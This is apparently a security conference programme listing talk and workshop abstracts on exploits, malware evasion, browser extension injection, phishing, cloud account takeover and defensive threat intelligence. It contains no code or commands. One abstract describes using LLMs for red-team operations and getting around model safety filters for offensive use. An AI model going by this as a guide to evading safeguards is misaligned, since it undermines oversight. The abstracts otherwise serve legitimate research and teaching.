Conference opening by OrangeCon Orga

Modern cybersecurity, as we all know today, is the result of years of transformation. It was back in the 80s when pioneering hacking enthusiasts began aggregating in self-organized communities, exploring the boundaries and capabilities of computer systems and networks. These individuals, often seen as alternative personalities who struggled to fit into an increasingly globalized and controlled society, found their freedom within the hacking subculture.

Driven by passion and curiosity, this movement rapidly grew, creating digital communication platforms for virtual connections, and organizing hacking camps and conferences for social gatherings. Naturally, this initial wave of pioneering geeks matured, with many transitioning into responsible adults. Some went on to establish businesses, offering security services and developing products to meet the growing demands of a growing security market.

In this keynote, we explore this significant social transformation and reflect on its current state: a cybersecurity realm dominated by large-scale multinational corporations where individuals are not necessarily viewed as like-minded enthusiasts driven by passion and curiosity, but as part of a workforce that can be replaced by autonomous systems to cut costs and maximize profits.

A Steering of Roaming (SoR) solution in the telecom world is a component used by mobile network operators to manage which networks their subscribers connect to when roaming in other countries. While fuzzing a globally used SoR component, we discovered a remote code execution vulnerability that could be exploited from the position of other telecom operators. In this talk we want to take you with us on the journey from fuzzing setup to crash discovery, initial exploitation all the way to overcoming the network isolation and protocol constraints to craft a exploit that allows for two way communication.

An insightful and practical talk about how accessibility and security are linked, how you can solve common problems that could arise for people using assistive devices or software, and what to gain from doing so.

When investigating the security of a smart device, we often encounter a very limited attack surface with no open ports, encrypted network traffic, and no logging. In this session, Wilco will show how to break through these barriers on an ESP32, a microcontroller widely used in IoT devices, such as smart switches, EV charging stations, and many other smart home devices.

Wilco will present techniques for obtaining, reverse engineering, and patching the firmware of an ESP32, and show these techniques in practice during demo sections by disabling certificate pinning and enabling debug logging on an ESP32 device.

After this session, you will have the knowledge and skills to start reverse engineering your own ESP32-based IoT devices, opening up new paths for vulnerability research.

The SOHO Smashup is a famous category in the IoT focused edition of Pwn2Own. Contestants are challenged to exploit a router from the WAN side and then use that device to exploit a second device on the internal LAN. Last year, we took them up on this challenge and successfully demonstrated a 0day exploit chain against a QNAP router and pivoting to a TrueNAS system. In this presentation, we'll describe how we performed our research and the vulnerabilities we found.

Designed for both Blue and Red teams, this hands-on workshop is designed to equip participants with a deep dive into AWS enumeration techniques and detection opportunities. Through guided labs, attendees will learn how attackers can use policy misconfigurations to identify paths to their objectives. For defenders, we will discuss real-world detection opportunities, log sources, and effective monitoring strategies to identify suspicious enumeration activity before it escalates into full-blown compromise.

Along the way we introduce dAWShund, a new tool designed to map and visualize AWS resource relationships, helping Red Teams identify attack paths and Blue Teams strengthen defenses to help put a leash on naughty permissions. The idea is to hold an interactive workshop fostering and encouraging discussions among participants.

By the end of the workshop, attendees would be able:
- Understand the differences between AWS resources and policy types. (TL;DR it’s a hot mess)
- Get a grasp of permissions validation (A bigger hot mess)
- Spot detection opportunities for enumeration (We' ll use Sentinel and KQL)
- Discuss areas of improvement for the future

Technical requirements for the audience:
- Don't forget to bring your own laptop
- Basic knowledge of AWS; although all terminology will be explained.

In this workshop, we will use tools developed by Didier Stevens to deal (analysis & traffic decryption) with malicious Cobalt Strike beacons.

There used to be a time, that a blue teamer could say: "this sample I just analyzed is a Cobalt Strike beacon: I'm sure this is a pentest".
That is no longer the case: Cobalt Strike has become very popular with common criminals, and even some APT crews. Nowadays, if you encounter a Cobalt Strike sample, your organization is more likely to be under real attack than under simulated attack.

Pack, obfuscate, or encrypt your malware as much as you want to prevent detection. This works reasonably well, but ultimately your malware always runs somewhere in the memory of a computer. This is an inherent problem with all of the aforementioned techniques. At some point during execution, the payload that you have tried to hide as much as possible is decrypted to plain text, because only then can it be executed properly.

In this presentation, you will learn more about the hurdles of such polymorphic malware and how to detect it. I then introduce you to the concept of modern metamorphic malware and how this type of malware circumvents static and in-memory detection. I demonstrate that static in-memory detection is now completely dead, and we can no longer rely on it, especially when practical implementations of metamorphic malware become publicly available.

As the icing on the cake, I publish such a practical implementation: Dittobytes. Dittobytes is a project for true metamorphic cross-compilation of C-code to Truly Position Independent Code (PIC). Malware compiled with Dittobytes runs everywhere natively — in any process, on Windows, Mac, and Linux, and both on X86 and ARM64. The best part? It's different every time you compile it!

This presentation introduces a stealthy technique for injecting arbitrary extensions into Chromium-based browsers by manipulating the Preferences file.

The method, which remains relatively obscure, expands on the groundwork laid by Pablo Picazo-Sanchez, Gerardo Schneider, and Andrei Sabelfeld in their 2020 whitepaper.

The focus of the presentation is on refining and enhancing this approach to circumvent recent security measures implemented in the latest Chromium versions. It demonstrates the automation of this process through an exploitation script and showcases various post-exploitation attacks that leverage the chromium API which permits :
- Stealing of cookies and Localstorage credentials
- Getting history of navigation
- Partial access to the FS
- And much more ...

From covert state-backed espionage to financially motivated cybercrime, from politically charged hacktivism to digital sabotage—threat actors targeting the Netherlands come in many forms, and their tactics are constantly evolving.

In this talk, the Cyber Threat Intelligence (CTI) team of the Dutch National Cyber Security Centre (NCSC) offers a rare behind-the-scenes look at how they investigate and analyze these threats in support of the Dutch government and critical infrastructure sectors.

Through real-world case studies, we’ll demonstrate how our team monitors, classifies, and contextualizes activity from a wide range of threat actors—including nation-states, cybercriminal groups, hacktivists, and actors with sabotage-related intents. You’ll see how this intelligence fuels key NCSC products like the CTI-Report and the quarterly Threat Landscape Analysis, which provide essential context and action-oriented insights to our partners.

We’ll also present Pharos for the first time: a powerful, in-house developed tool that continuously scans the internet for signs of malicious infrastructure. By leveraging sources like Censys, Shodan, and VirusTotal through custom queries, Pharos helps us identify suspicious IPs, domains, certificates, and more—before they’re used in active campaigns. We will explain how we leverage this type of intelligence, not only for ourselves but within a broader cybersecurity ecosystem.

Join us for a deep dive into the operational world of national CTI: where strategic intelligence meets technical investigation, and where safeguarding the digital security of the Netherlands is a daily mission.

Red Team operations often involve juggling dozens of tools, manual workflows, and fragile automation. Is AI finally going to save us and help us tie things together? Or are we adding yet another layer of unnecessary complexity? In this talk, I will share how we are using Large Language Models (LLMs) to orchestrate Red Team operations by integrating them directly into our infrastructure, using custom Model Context Protocol (MCP) servers.

MCP provides LLMs with access to in-house tools and data, providing a natural language interface between operators and backend systems. I will walk through how we wired it up to perform tasks like querying implant data, launching redirectors, checking logs, and flagging OPSEC risks in payloads. The focus will be on practical implementation details: what worked, what didn’t, and how we handled LLM limitations in the context of real operations.

You will learn how MCP works under the hood, what components are needed, how it interfaces with tools, and how we deal with model safety filters that can get in the way of offensive use cases. The goal is to show how accessible it is to build your own interface, and how LLMs can become a useful part of your Red Team toolkit today. I will conclude with ideas for where this kind of integration makes the most sense, and where it still falls short.

This talk is for anyone curious about leveraging LLMs to finally sweet-talk your tooling into doing what you want it to, whether in security, operations, or elsewhere.

Containerizing an application unlocks a wealth of possibilities: in theory, containers can be easily scaled, managed, recreated, defined as code, and more. However, the convenience of these powerful tools sometimes leads us to overlook the underlying mechanics and the security implications involved. While many aspects of developing with containers resemble those of traditional applications, containers also introduce unique characteristics and challenges that must not be ignored.

As modern vehicles evolve into complex networks of software and hardware, they become increasingly susceptible to cyber threats. In this hands-on workshop, we will explore how vulnerabilities in automotive systems can be identified, analyzed, and demonstrated. Participants will dive into real-world scenarios using practical tools and techniques to penetrate vehicle networks, uncover security flaws, and experiment with live attacks. This workshop bridges the gap between theoretical knowledge and practical skills, empowering attendees to better understand the increasingly connected automotive landscape.

The session will begin with an introduction to automotive security concepts and the architecture of modern vehicle networks. Participants will then learn how to interact directly with the Controller Area Network (CAN) bus, the central communication system in most vehicles. Through guided, hands-on exercises, they will reverse engineer messages to the instrument cluster and send spoofed signals to manipulate displayed information.

Let me walk you through the modern techniques hackers use today to take over cloud accounts - methods that are far more stealthy and persistent than most users or security teams realize.
We'll examine how attackers steal session cookies from unsuspecting victims, silently modify email account settings to intercept or redirect messages, and leverage OAuth applications to maintain
long-term access even if the user changes their password or enables two-factor authentication. These tactics often leave no alerts or obvious signs, allowing the attacker to persist undetected for weeks or even months.
To better understand and replicate these threats, we've developed two custom red team tools: ATOLS and FASSA.
These tools simulate real-world attack paths used by adversaries, allowing organizations to test their detection capabilities and response processes in a controlled and safe environment.
Today, we’re going to show you exactly how they work and what you can do to stay ahead.

Local name resolution poisoning attacks are almost as old as Active Directory itself – and yet, the magic of Windows environments retro-compatibility makes them still effective in 2025.

One of the very first offensive actions carried out by an attacker with access to an internal network is to attempt exploiting the LLMNR, mDNS or NBNS protocols that are even today enabled by default, in order to gain an authenticated foothold into the Active Directory infrastructure.

To the pentesters thinking that local name resolution attacks are well-known exploit primitives that do not have any more surprises in store for us – this presentation is here to prove you wrong. We will dive into two new techniques recently introduced that enhance the NTLM and Kerberos relaying capabilities of local name resolution poisoning, and their implementation in open-source tools such as Responder and krbrelayx.

Discover how to trick Windows SMB clients into falling back to WebDav HTTP authentication that do not implement signing, or how to perform Kerberos relaying through LLMNR, all illustrated by concrete exploit demonstrations!

In today’s cybersecurity landscape, organizations are under constant pressure to defend against evolving threats. As a result, many turn to Managed Detection and Response (MDR) providers, who often promise peace of mind through glowing dashboards and polished Key Performance Indicators (KPIs). But behind the marketing sheen lies a critical question: Are these KPIs actually providing value?

This session will unpack the illusion of comfort that many MDR vendors create by highlighting surface-level metrics — response time, alert volume, SLA compliance — that often resonate with executives but fail to reflect operational reality. We’ll explore the disconnect between boardroom optics and SOC floor effectiveness, emphasizing that KPI’s must be more than impressive — they must be actionable.

Attendees will walk away with a critical lens for evaluating cybersecurity KPIs, a framework for identifying metrics that drive real security outcomes, and a renewed focus on tracking what truly matters in the fight against modern threats.

Phishing isn’t dead, but relying on email alone doesn't cut it anymore.

Spam filters are smarter than ever. Domain reputation matters. Content is scanned and scored. Automated tools scan domains as soon as they request a TLS certificate. Most phishing emails never even make it to the inbox due to automated scanners. And when they do, users are trained to be suspicious.

In this workshop, we’ll start by looking at email, which is still the most common channel for phishing. You’ll see the increasingly ridiculous hoops attackers have to jump through just to get a single message into a user’s inbox. From domain aging and sender reputation to anti bot detection, client-side obfuscation and spam filter scoring. It’s a game of constant trial and error. We will then focus on other ways to deliver your messages through alternative, unfiltered, channels such as Microsoft Teams, QR codes, SMS, LinkedIn or shared documents.

Participants will work with real-world personas to build convincing pretexts using OSINT, and then decide how they would deliver their phishing message. If email looks too risky or unlikely to succeed, you’ll explore alternative channels like Teams, SMS, LinkedIn, or even QR codes. The goal is to think like an attacker, adapt to defenses, and figure out how the message gets through.

Key Takeaways:
- Understand why phishing via email is harder than ever and what modern filters look for
- Learn the steps attackers take to bypass spam detection and deliver a single message
- Use open source intelligence to craft realistic, targeted phishing pretexts
- Explore the importance of timing, trust signals, and context in social engineering
- Compare multiple delivery channels beyond email and assess their trade-offs
- Think like an attacker when planning phishing campaigns, and identify where defenses can fail
- Gain practical insight into how phishing simulations can be made more realistic and impactful

Token Theft attacks have risen during the past few years as organisations have moved to stronger authentication methods. Entra ID has built-in protections to mitigate these attacks. This session will cover how to use these protections and technical details of how they work under the hood.

In an era of information warfare, social engineering is no longer limited to isolated phishing emails. It’s about overwhelming minds. From misinformation to algorithmic overload, cyber professionals today face a new form of threat: emotional hijack. In this session, former intelligence officer and behavioral analyst An Gaiser unpacks how this invisible attack vector works, and how it hijacks more than just attention.

Using real-world examples from counter-terrorism, security screening, and AI-driven profiling systems, An reveals how "flooding the zone" disables our critical thinking and activates deep behavioral responses (fight, flight, freeze, affiliate). We will explore how this impacts decision-making in cybersecurity teams, especially in moments of ambiguity or pressure.

This talk challenges common assumptions in the security field, including outdated emotion recognition models still used in AI tools, and offers a grounded framework for detecting, interpreting, and de-escalating emotional flooding, both in ourselves and others.

Expect a mix of behavioral science, real-world intelligence cases, and practical takeaways you can use in your daily work. Whether you're a red teamer probing human error, a blue teamer navigating stress signals, or a leader seeking clarity in chaos: this session will give you a new lens to detect the invisible and stay cognitively sharp under pressure.

This keynote will explore not only why we need to become more digitally independent, but also how on earth we can make that happen.

Closing of the conference